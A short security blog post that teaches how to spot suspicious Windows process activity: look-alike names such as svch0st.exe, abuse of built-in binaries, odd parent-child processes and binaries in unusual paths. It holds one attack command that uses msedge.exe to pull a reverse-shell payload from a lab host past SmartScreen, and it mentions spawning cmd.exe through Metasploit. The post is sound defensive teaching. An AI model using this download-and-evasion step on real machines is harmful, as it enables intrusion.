SecurityNguyen
Posts Tags About Categories
SecurityNguyen

Contents

Suspicious Process Activity

Nguyen Nguyen included in Fundamental
   363 words   2 minutes 

Note: If you need to zoom in, you can click on the image.

Techniques:

Hiding in Plain Sight

“Hiding in Plain Sight” is basically changing a letter of a process with like an number.
For example: svch0st.exe vs svchost.exe


Original svchost.exe:

Our fake: svchost.exe

As you can see from the picture above, there are some information or section that we can use to identify a legitimate process vs a malicious process. For instance, the parent section, Image file name, number of instance of the process, and the status of it being unverified can help.

Here is the normal information for svchost.exe:
Process Name: svchost.exe File Path: %systemroot%\\System32\\svchost.exe Parent Process: services.exe Number of instance: More than 1
One tool that is helpful to learn a binary "normal behavior" is EchoTrail.
Link: https://www.echotrail.io/

Living off the Land Binaries (LOLBAS)

Using the built in windows binary that are within the system to carry out malicious actions.
Reference: https://lolbas-project.github.io/#
In this example, we are going to use msedge.exe to download an reverse shell and spawn a command shell to execute an command.
With smart screen:


The picture bellow show that Microsoft edge is being used to download a reverse shell (svch0st.exe.txt). This method avoid the smart screen.
Command: `msedge.exe http://192.168.109.6:9000/svch0st.exe.txt`



Suspicious Parent-Child Relationship

One example of a Suspicious Parent-Child Relationship is when word.exe (Microsoft Office) or msedge.exe spawn a command prompt.
In the picture below, through Metasploit, I spawn cmd.exe through the command: “shell”. Then I executed a command that create a file called “textone” that contains the text “Hello”.
This activity is all executed under the process: “msedge.exe”.





Process Hacker Perspective:

As you can see above, cmd.exe parent process is msedge.exe. This mean that msedge.exe spawn cmd.exe which is not a normal activity.

SIEM Perspective:


If an adversary spawn cmd.exe using msedge.exe. You can note the process id of command line and follow the chain of command execution.



Suspicious Binaries Path

Common Windows Process usually run under: C:\Windows\System32\. Any “Windows process” residing outside that file path raise a suspicion.


As you can see from the picture above, svch0st.exe resides in "C:\\Users\\jKing\\Downloads". Which is awfully suspicious. Normally, svchost.exe resides in C:\\Windows\\System32.

That’s all I wanted to cover.

Updated on 2024-05-09
 Fundamental
Back | Home